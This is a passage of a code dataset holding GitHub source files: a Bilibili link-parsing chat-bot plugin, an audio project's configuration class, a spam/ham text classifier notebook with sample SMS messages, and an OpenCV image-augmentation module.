+{"seq_id": "8762078583", "text": "import re\n\nfrom nonebot import on_regex\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent, MessageEvent\nfrom nonebot.log import logger\n\nfrom .analysis_bilibili import b23_extract, bili_keyword\nfrom utils.rauthman import isInService\n\n\n__help_plugin_name__ = 'B站视频解析'\n__des__ = 'Bilibili视频、番剧解析'\n__author__ = 'mengshouer + NekoAria'\n__level__ = '1'\n__cmd__ = '''\n发送Bilibili视频链接、小程序、BV号等\n'''.strip()\n__example__ = '''\nBV114514\n'''.strip()\n__note__ = '''\n- N/A'''\n__usage__ = f'''{__des__}\n作者:{__author__}\n权限等级:{__level__}\n用法:{__cmd__}\n举例:{__example__}\n备注:{__note__}'''\n\n\nanalysis_bili = on_regex(\n r\"(b23.tv)|(bili(22|23|33|2233).cn)|(.bilibili.com)|(^(av|cv)(\\d+))|(^BV([a-zA-Z0-9]{10})+)|\"\n r\"(\\[\\[QQ小程序\\]哔哩哔哩\\])|(QQ小程序]哔哩哔哩)|(QQ小程序]哔哩哔哩)\",\n flags=re.I,\n rule=isInService(\"B站视频解析\", 1))\n\n\n@analysis_bili.handle()\nasync def analysis_main(event: MessageEvent) -> None:\n text = str(event.message).strip()\n if re.search(r\"(b23.tv)|(bili(22|23|33|2233).cn)\", text, re.I):\n # 提前处理短链接,避免解析到其他的\n text = await b23_extract(text)\n group_id = event.group_id if isinstance(event, GroupMessageEvent) else None\n msg = await bili_keyword(group_id, text)\n if msg:\n try:\n await analysis_bili.send(msg)\n except Exception as e:\n logger.error(e)", "repo_name": "Cytrogen/Hoka-Bot", "sub_path": "src/plugins/bilibili_analysis/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nonebot.on_regex", "line_number": 31, "usage_type": "call"}, {"api_name": "re.I", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.rauthman.isInService", "line_number": 35, "usage_type": "call"}, {"api_name": "nonebot.adapters.onebot.v11.MessageEvent", "line_number": 39, "usage_type": "name"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.I", "line_number": 41, "usage_type": "attribute"}, {"api_name": "analysis_bilibili.b23_extract", "line_number": 43, "usage_type": "call"}, {"api_name": "nonebot.adapters.onebot.v11.GroupMessageEvent", "line_number": 44, "usage_type": "argument"}, {"api_name": "analysis_bilibili.bili_keyword", "line_number": 45, "usage_type": "call"}, {"api_name": "nonebot.log.logger.error", "line_number": 50, "usage_type": "call"}, {"api_name": "nonebot.log.logger", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "74394865368", "text": "import json\nimport logging\nimport mongoengine\nimport os\nfrom ConfigParser import ConfigParser\nfrom abjad.tools import stringtools\n\n\nclass SashaConfiguration(dict):\n\n ### CLASS VARIABLES ###\n\n __slots__ = (\n '_environment',\n '_logger',\n '_mongodb_client',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, environment='development'):\n import sasha\n sasha_root = sasha.__path__[0]\n parser = ConfigParser(dict_type=dict)\n sasha_cfg_file_path = os.path.join(sasha_root, 'sasha.cfg')\n assert os.path.exists(sasha_cfg_file_path)\n parser.read(sasha_cfg_file_path)\n for section in parser.sections():\n self[section] = {}\n for option, value in parser.items(section):\n self[section][option] = value\n self._logger = logging.getLogger('sasha')\n self.logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(\n os.path.join(sasha_root, self['logging']['logfile']))\n handler.setLevel(logging.DEBUG)\n log_message = '%(asctime)s - %(name)s - %(levelname)s: %(message)s'\n formatter = logging.Formatter(log_message)\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self._mongodb_client = None\n assert environment in ('testing', 'development', 'deployment')\n self._environment = environment\n\n ### PUBLIC METHODS ###\n\n def bootstrap(self):\n from sasha.tools.systemtools import Bootstrap\n Bootstrap()()\n\n def connect(self):\n if self._mongodb_client is not None:\n self._mongodb_client.close()\n self._mongodb_client = mongoengine.connect(self.mongodb_database_name)\n\n @staticmethod\n def find_executable(executable_name):\n def is_executable(fpath):\n return os.path.exists(fpath) and os.access(fpath, os.X_OK)\n\n def extension_candidates(file_path):\n yield file_path\n for extension in os.environ.get('PATHEXT', '').split(os.pathsep):\n yield file_path + extension\n file_path, file_name = os.path.split(executable_name)\n if file_path:\n if is_executable(executable_name):\n return executable_name\n else:\n for path in os.environ['PATH'].split(os.pathsep):\n executable_file = os.path.join(path, executable_name)\n for candidate in extension_candidates(executable_file):\n if is_executable(candidate):\n return candidate\n return None\n\n def get_audiodb_parameters(self, name):\n import sasha\n sasha_root = sasha.__path__[0]\n assert name in self['audioDB']\n item = self['audioDB'][name].split(',')\n db_path = os.path.join(\n self['media_root'][self.environment],\n self['media']['databases'],\n item[0].strip())\n if not os.path.isabs(db_path):\n db_path = os.path.abspath(os.path.join(sasha_root, db_path))\n klass_path = item[1].strip()\n module_name = klass_path.rpartition('.')[0]\n klass_name = klass_path.rpartition('.')[-1]\n module = __import__(module_name, globals(), locals(), [klass_name])\n klass = getattr(module, klass_name)\n return db_path, klass\n\n def get_binary(self, name):\n return self['binaries'][name]\n\n def get_fixtures(self, cls):\n from sasha import sasha_configuration\n cls_name = stringtools.to_snake_case(cls.__name__)\n fixtures_path = os.path.join(\n sasha_configuration.get_media_path('fixtures'),\n cls_name + 's',\n #cls.__tablename__,\n )\n fixture_file_names = os.listdir(fixtures_path)\n fixture_file_names = (\n _ for _ in fixture_file_names\n if _.startswith(cls_name) and _.endswith('.json')\n )\n fixture_file_paths = (\n os.path.join(fixtures_path, _)\n for _ in fixture_file_names\n )\n fixtures = []\n for fixture_file_path in fixture_file_paths:\n with open(fixture_file_path, 'r') as file_pointer:\n fixture 
= json.load(file_pointer)\n fixtures.append(fixture)\n return fixtures\n\n def get_media_path(self, name):\n import sasha\n sasha_root = sasha.__path__[0]\n path = os.path.join(\n self['media_root'][self.environment],\n self['media'][name])\n if not os.path.isabs(path):\n path = os.path.abspath(os.path.join(sasha_root, path))\n return path\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def environment(self):\n return self._environment\n\n @environment.setter\n def environment(self, value):\n assert value in ['testing', 'development', 'deployment']\n self._environment = value\n self.connect()\n\n @property\n def logger(self):\n return self._logger\n\n @property\n def mongodb_client(self):\n return self._mongodb_client\n\n @property\n def mongodb_database_name(self):\n return 'sasha-{}'.format(self.environment)", "repo_name": "josiah-wolf-oberholtzer/sasha", "sub_path": "sasha/tools/systemtools/SashaConfiguration.py", "file_name": "SashaConfiguration.py", "file_ext": "py", "file_size_in_byte": 5158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sasha.__path__", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}, {"api_name": "sasha.tools.systemtools.Bootstrap", "line_number": 49, "usage_type": "call"}, {"api_name": "mongoengine.connect", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 59, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 63, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.pathsep", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.pathsep", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sasha.__path__", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, 
"usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "abjad.tools.stringtools.to_snake_case", "line_number": 100, "usage_type": "call"}, {"api_name": "abjad.tools.stringtools", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sasha.sasha_configuration.get_media_path", "line_number": 102, "usage_type": "call"}, {"api_name": "sasha.sasha_configuration", "line_number": 102, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 118, "usage_type": "call"}, {"api_name": "sasha.__path__", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "19454107569", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[22]:\n\n\nprint(' SpamHam Project ')\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import metrics\nimport seaborn as sn\nfrom sklearn.metrics import confusion_matrix\nimport re\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom sklearn import model_selection, preprocessing, naive_bayes,metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# In[5]:\n\n\ndf_inputdata = pd.read_csv('/Users/jaswanthjerripothula/Desktop/SpamHam.csv',usecols = [0,1],encoding = 'latin-1')\n\n\n# In[7]:\n\n\ndf_inputdata.head()\n\n\n# In[11]:\n\n\ndf_inputdata.rename(columns = {'v1': 'Category','v2': 'Message'}, inplace = True)\n\n\n# In[12]:\n\n\ndf_inputdata.head()\n\n\n# In[13]:\n\n\ndf_inputdata.count()\n\n\n# In[14]:\n\n\ndf_inputdata.groupby('Category').describe()\n\n\n# In[15]:\n\n\ndf_inputdata.groupby('Category').count()\n\n\n# In[18]:\n\n\ncategory_count = pd.DataFrame()\ncategory_count['count'] = df_inputdata['Category'].value_counts()\n\n\n# In[19]:\n\n\ncategory_count['count']\n\n\n# In[34]:\n\n\nfig , ax = plt.subplots(figsize = (12,6))\nsn.barplot (x = category_count.index , y = category_count['count'],ax = ax)\nax.set_ylabel ('Count',fontsize = 20)\nax.set_xlabel ('Category',fontsize = 20)\nax.tick_params(labelsize = 20)\n\n\n# In[33]:\n\n\n#Looking at the above numbers of hams and spams there are more number of hams than spams \n\n\n# In[35]:\n\n\n#Preprocessing Tweets for removing punctuations(! , '), @ , # , https , special characters\ndef processMessage(tweet):\n from string import punctuation\n tweet = re.sub(r'\\&\\w*;','',tweet)\n tweet = re.sub('@[^\\s]+','',tweet)\n tweet = re.sub(r'\\$\\w*','',tweet)\n tweet = tweet.lower()\n tweet = re.sub(r'https?:\\/\\/.*\\/\\w*','',tweet)\n tweet = re.sub(r'#\\w*','',tweet)\n tweet = re.sub(r'['+punctuation.replace('@','')+']+','',tweet)\n tweet = re.sub(r'\\b\\w{1,2}\\b','',tweet)\n tweet = re.sub(r'\\s\\s+',' ',tweet)\n tweet = tweet.lstrip(' ')\n tweet = ''.join(c for c in tweet if c <= '\\uFFFF')\n return tweet\n\n\n# In[37]:\n\n\ndf_inputdata['Message'] = df_inputdata['Message'].apply(processMessage)\n\n\n# In[38]:\n\n\ndf_inputdata['Message'].head(7)\n\n\n# In[39]:\n\n\ndf_inputdata['Message'].tail(7)\n\n\n# In[40]:\n\n\ndf_inputdata['Category'].value_counts()\n\n\n# In[42]:\n\n\n#convert the labels from text to numbers\nlabel_encoder = preprocessing.LabelEncoder()\ndf_inputdata['Category'] = label_encoder.fit_transform(df_inputdata['Category'])\n\n\n# In[43]:\n\n\nX = df_inputdata.Message\ny = df_inputdata.Category\n\n\n# In[44]:\n\n\ndf_inputdata['Category'].head(7)\n\n\n# In[45]:\n\n\n#Split the dataser into 80% and 20% for training respectively\nX_train , X_test , y_train , y_test = train_test_split(X,y,test_size = 0.20)\n\n\n# In[46]:\n\n\ntype (X_train)\n\n\n# In[47]:\n\n\n#convert the raw document into a matrix of TF-IDF features\ntfidf_vect = TfidfVectorizer(analyzer = 'word', token_pattern = r'\\w{1,}', max_features = 20000)\n#Create TF-IDF with X_train\ntfidf_vect.fit(X_train)\n\n\n# In[48]:\n\n\n#the TF-IDF created with X_train for transforming X_train and X_test\nxtrain_tfidf = tfidf_vect.transform(X_train)\nxvalid_tfidf = tfidf_vect.transform(X_test)\n\n\n# In[50]:\n\n\n#Create a model for NaiveBaye's Model\nmodel = 
naive_bayes.MultinomialNB()\n\n\n# In[51]:\n\n\n#Create a model for NaiveBaye's Model\nmodel = naive_bayes.MultinomialNB()\n\n\n# In[53]:\n\n\n#Get the prediction for X_test which is transformed with TF-IDF \ny_pred = model.predict(xvalid_tfidf)\n\n\n# In[57]:\n\n\n#Get accuracy for the model\nmetrics.accuracy_score(y_test,y_pred)\n\n\n# In[63]:\n\n\n#Get the confusion Matrix\ncm = confusion_matrix(y_test,y_pred)\nconf_matrix = pd.DataFrame(data = cm , columns = ['Predicted : 0','Predicted : 1'],\n index = ['Actual : 0','Actual : 1'])\nplt.figure(figsize = (8,5))\nsn.heatmap(conf_matrix, annot=True , fmt = 'd', cmap = \"YlGnBu\")\n\n\n# In[69]:\n\n\n#Ham input for testing\nmyHamData = np.array([\"Nah I don't think he goes to usf, he lives around here though\"])\n#Spam input for testing \nmySpamData = np.array([\"URGENT! You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18\"])\n\n\n# In[70]:\n\n\nmyHamData = tfidf_vect.transform(myHamData)\n\n\n# In[101]:\n\n\ny_result1 = model.predict(myHamData)\n\n\n# In[102]:\n\n\ny_result1[0]\n\n\n# In[103]:\n\n\nhamvalue = label_encoder.inverse_transform([y_result1[0]])\n\n\n# In[105]:\n\n\nhamvalue[0]\n\n\n# In[121]:\n\n\n#Spam,Ham\nmyMultiplesData=[\"Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's\",\"Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030\",'I HAVE A DATE ON SUNDAY WITH WILL!!']\n\n\n# In[122]:\n\n\ndf_myMultiplesData=pd.DataFrame(myMultiplesData,columns={'Message'})\n\n\n# In[123]:\n\n\ndf_myMultiplesData['Message'] = df_myMultiplesData['Message'].apply(processMessage)\n\n\n# In[124]:\n\n\nmyMultiData = tfidf_vect.transform(df_myMultiplesData['Message'])\n\n\n# In[125]:\n\n\ny_predlabels=model.predict(myMultiData)\n\n\n# In[126]:\n\n\ny_predlabels.shape\n\n\n# In[127]:\n\n\n#y_predlabels=y_prelabels.reshape(-1)\n\n\n# In[128]:\n\n\nvals = label_encoder.inverse_transform(y_predlabels)\n\n\n# In[129]:\n\n\nfor val in vals:\n print(val)\n\n\n# In[130]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[131]:\n\n\nreport = classification_report(y_test,y_pred,labels=[0,1])\n\n\n# In[132]:\n\n\nprint(report)\n\n\n# In[133]:\n\n\ntype(report)\n\n\n# In[134]:\n\n\n#recall=TP/(TP+FN)\n#precision=TP/(TP+FP)\n#f1-score = 2*(precision*recall)/(precision+recall)\n\n\n# In[146]:\n\n\nTP = cm[0,0]\nFN = cm[0,1]\nFP = cm[1,0]\nTN = cm[1,1]\n\n\n# In[137]:\n\n\nrecall = TP/(TP+FN)\n\n\n# In[138]:\n\n\nrecall\n\n\n# In[141]:\n\n\nprecision = TP/(TP+FP)\n\n\n# In[142]:\n\n\nprecision\n\n\n# In[143]:\n\n\nf1score = 2*(precision*recall)/(precision+recall)\n\n\n# In[144]:\n\n\nf1score\n\n\n# In[145]:\n\n\nprint(' HAMSPAM Project completed successfully ')\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "JJas00/DataAnalyst-and-ML-Projects", "sub_path": "Project1@SpamHam.py", "file_name": "Project1@SpamHam.py", "file_ext": "py", "file_size_in_byte": 6146, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, 
"usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 84, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 102, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 103, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 104, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 106, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 107, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 108, "usage_type": "call"}, {"api_name": "string.punctuation.replace", "line_number": 108, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 108, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 109, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 195, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 195, "usage_type": "name"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 202, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 216, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 223, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 279, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 334, "usage_type": "call"}]}
+{"seq_id": "70980158168", "text": "from __future__ import absolute_import\nimport random\nimport itertools\nimport numpy as np\nimport cv2 as cv\nfrom aug import helper\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Abstract augmenter\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass Augmenter(object):\n\n def __init__(self):\n self.name = None\n self.params = None\n self.params_random = None\n\n @staticmethod\n def transform(img, *arg):\n pass\n\n def augment_random(self, *images):\n params = [p.get() for p in self.params_random]\n name = \"{}[{}]\".format(self.name, helper.to_string(params))\n results = []\n for img in images:\n dst = self.transform(img, *params)\n results.append(dst)\n return results, name\n\n def augment_fixed(self, image):\n for params in itertools.product(*self.params):\n dst = self.transform(image, *params)\n name = \"{}[{}]\".format(self.name, helper.to_string(params))\n yield (dst, name)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Augmenters\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass CopyParam(object):\n @staticmethod\n def get():\n return \"{}\"\n\n\nclass CopyAugmenter(Augmenter):\n\n def __init__(self):\n super(CopyAugmenter, self).__init__()\n self.param = \"{}\"\n self.params_random = [CopyParam()]\n self.name = 'co'\n\n @staticmethod\n def transform(img, param):\n return img\n\n\nclass RotateAugmenter(Augmenter):\n\n def __init__(self, degrees=(0, 90, 180, 270)):\n super(RotateAugmenter, self).__init__()\n self.params = [degrees]\n self.params_random = [RandomElement(degrees)]\n self.name = 'ro'\n\n @staticmethod\n def transform(img, degree):\n if degree == 0:\n return img\n if degree not in [90, 180, 270]:\n print(\"Warning: unsupported rotation degree. 
Ignoring\")\n return None\n if degree == 90:\n dst = cv.transpose(img)\n return cv.flip(dst, 1)\n if degree == 180:\n return cv.flip(img, -1)\n if degree == 270:\n dst = cv.transpose(img)\n return cv.flip(dst, 0)\n\n\nclass RotateAngleAugmenter(Augmenter):\n\n def __init__(self, degrees=(-10, 0, 10)):\n super(RotateAngleAugmenter, self).__init__()\n self.params = [degrees]\n self.params_random = [RandomFromRange(min(degrees), max(degrees))]\n self.name = 'ra'\n\n @staticmethod\n def transform(img, degree):\n if degree == 0:\n return img\n h, w = img.shape[:2]\n m = cv.getRotationMatrix2D((w / 2, h / 2), degree, 1)\n return cv.warpAffine(img, m, (w, h))\n\n\nclass FlipAugmenter(Augmenter):\n\n def __init__(self, flips=(None, 0, 1)):\n super(FlipAugmenter, self).__init__()\n self.params = [flips]\n self.params_random = [RandomElement(flips)]\n self.name = 'fl'\n\n @staticmethod\n def transform(img, flip):\n if flip is None:\n return img\n dst = cv.flip(img, flip)\n return dst\n\n\nclass HueDistortionAugmenter(Augmenter):\n\n def __init__(self, factors=(-3, 3, 0, 7, -7)):\n super(HueDistortionAugmenter, self).__init__()\n self.params = [factors]\n self.params_random = [RandomFromRange(min(factors), max(factors))]\n self.name = 'hu'\n\n @staticmethod\n def transform(img, factor):\n\n if factor == 0 or helper.is_mask(img):\n return img\n\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv) # H: 0 - 180, S: 0 - 255, V: 0 - 255\n hsv_max = 180\n\n h = np.uint8(h + factor)\n if factor > 0:\n h[h > hsv_max] -= hsv_max\n if factor < 0:\n h[h > hsv_max] -= 75\n\n dst = cv.merge([h, s, v])\n dst = cv.cvtColor(dst, cv.COLOR_HSV2BGR)\n return dst\n\n\nclass SaturationDistortionAugmenter(Augmenter):\n\n def __init__(self, factors=(-10, 10, 0, 20, -20)):\n super(SaturationDistortionAugmenter, self).__init__()\n self.params = [factors]\n self.params_random = [RandomFromRange(min(factors), max(factors))]\n self.name = 'sa'\n\n @staticmethod\n def transform(img, factor):\n\n if factor == 0 or helper.is_mask(img):\n return img\n\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv) # H: 0 - 180, S: 0 - 255, V: 0 - 255\n\n s = cv.add(s, factor)\n s[s == factor] = 0\n\n dst = cv.merge([h, s, v])\n dst = cv.cvtColor(dst, cv.COLOR_HSV2BGR)\n return dst\n\n\nclass BrightnessAugmenter(Augmenter):\n\n def __init__(self, ratios=(0.9, 1.0, 1.1)):\n super(BrightnessAugmenter, self).__init__()\n self.params = [ratios]\n self.params_random = [RandomFromRange(min(ratios), max(ratios))]\n self.name = 'br'\n\n @staticmethod\n def transform(img, ratio):\n\n if ratio == 1.0 or helper.is_mask(img):\n return img\n\n img = img * ratio\n img[img > 255] = 255\n img = np.uint8(img)\n return img\n\n\nclass BlurAugmenter(Augmenter):\n\n def __init__(self, kernels=(1, 7)):\n super(BlurAugmenter, self).__init__()\n self.params = [kernels]\n self.params_random = [RandomNormalFromRange(min(kernels), max(kernels), step=2)]\n self.name = 'bl'\n\n @staticmethod\n def transform(img, kernel):\n\n if kernel <= 1 or helper.is_mask(img):\n return img\n\n dst = cv.GaussianBlur(img, (kernel, kernel), 0)\n return dst\n\n\nclass NoiseAugmenter(Augmenter):\n\n def __init__(self, variances=(0, 7, 15)):\n super(NoiseAugmenter, self).__init__()\n self.params = [variances]\n self.params_random = [RandomNormalFromRange(min(variances), max(variances))]\n self.name = 'no'\n\n @staticmethod\n def transform(img, variance):\n\n if variance == 0 or helper.is_mask(img):\n return img\n\n mean = 0\n sigma = variance**0.5\n gauss = 
np.random.normal(mean, sigma, img.shape)\n # gauss = gauss.reshape(image.shape)\n dst = img + gauss\n dst[dst < 0] = 0\n dst[dst > 255] = 255\n dst = np.uint8(dst)\n return dst\n\n\nclass PerspectiveAugmenter(Augmenter):\n\n def __init__(self, direction=(0, 1, 2, 3), ratio=(0.0, 0.3)):\n super(PerspectiveAugmenter, self).__init__()\n self.params = [direction, ratio]\n self.params_random = [RandomElement(direction), RandomFromRange(min(ratio), max(ratio))]\n self.name = 'pe'\n\n @staticmethod\n def transform(img, direction, ratio):\n\n if ratio == 0.0:\n return img\n\n height = img.shape[0]\n width = img.shape[1]\n offset = int((ratio / 2) * (height + width) / 2)\n\n if direction == 0:\n vectors = np.float32([[offset, 0], [-offset, 0], [0, 0], [0, 0]])\n elif direction == 1:\n vectors = np.float32([[0, 0], [0, offset], [0, -offset], [0, 0]])\n elif direction == 2:\n vectors = np.float32([[0, 0], [0, 0], [-offset, 0], [offset, 0]])\n else:\n vectors = np.float32([[0, offset], [0, 0], [0, 0], [0, -offset]])\n\n orig_pts = np.float32([[0, 0], [width, 0], [width, height], [0, height]])\n\n m = cv.getPerspectiveTransform(orig_pts - vectors, orig_pts)\n return cv.warpPerspective(img, m, dsize=img.shape[:2][::-1])\n\n\nclass SkewAugmenter(Augmenter):\n\n def __init__(self, direction=(0, 1, 2, 3), ratio=(0.0, 0.3)):\n super(SkewAugmenter, self).__init__()\n self.params = [direction, ratio]\n self.params_random = [RandomElement(direction), RandomFromRange(min(ratio), max(ratio))]\n self.name = 'sk'\n\n @staticmethod\n def transform(img, direction, ratio):\n\n if ratio == 0.0:\n return img\n\n height = img.shape[0]\n width = img.shape[1]\n offset = int((ratio / 2) * (height + width) / 2)\n\n if direction == 0:\n vectors = np.float32([[offset, 0], [0, 0], [-offset, 0]])\n orig_pts = np.float32([[0, 0], [width, 0], [width, height]])\n elif direction == 1:\n vectors = np.float32([[0, offset], [0, 0], [0, -offset]])\n orig_pts = np.float32([[width, 0], [width, height], [0, height]])\n elif direction == 2:\n vectors = np.float32([[-offset, 0], [0, 0], [offset, 0]])\n orig_pts = np.float32([[width, 0], [width, height], [0, height]])\n else:\n vectors = np.float32([[0, offset], [0, 0], [0, -offset]])\n orig_pts = np.float32([[0, 0], [width, 0], [width, height]])\n\n m = cv.getAffineTransform(orig_pts - vectors, orig_pts)\n return cv.warpAffine(img, m, dsize=img.shape[:2][::-1])\n\n\nclass CircleAugmenter(Augmenter):\n\n def __init__(self, shrink_ratios=(0.8, 0.9)):\n super(CircleAugmenter, self).__init__()\n self.params = [shrink_ratios]\n self.params_random = [RandomFromRange(min(shrink_ratios), max(shrink_ratios))]\n self.name = 'ci'\n\n @staticmethod\n def transform(img, shrink_ratio):\n center = (int(img.shape[1] / 2), int(img.shape[0] / 2))\n radius = int(min(img.shape[0], img.shape[1]) * 0.5 * shrink_ratio)\n circle = img * 0\n cv.circle(circle, center, radius, (1, 1, 1, 1), -1)\n img = img * circle\n crop = img[center[1] - radius:center[1] + radius, center[0] - radius:center[0] + radius]\n return crop\n\n\nclass PCAColorAugmenter(Augmenter):\n\n def __init__(self, ratio=(-0.1, -0.05, 0, 0.05, 0.1), eigen_vecs=None, eigen_vals=None):\n \"\"\"\n PCA color augmentation introduced in AlexNet. 
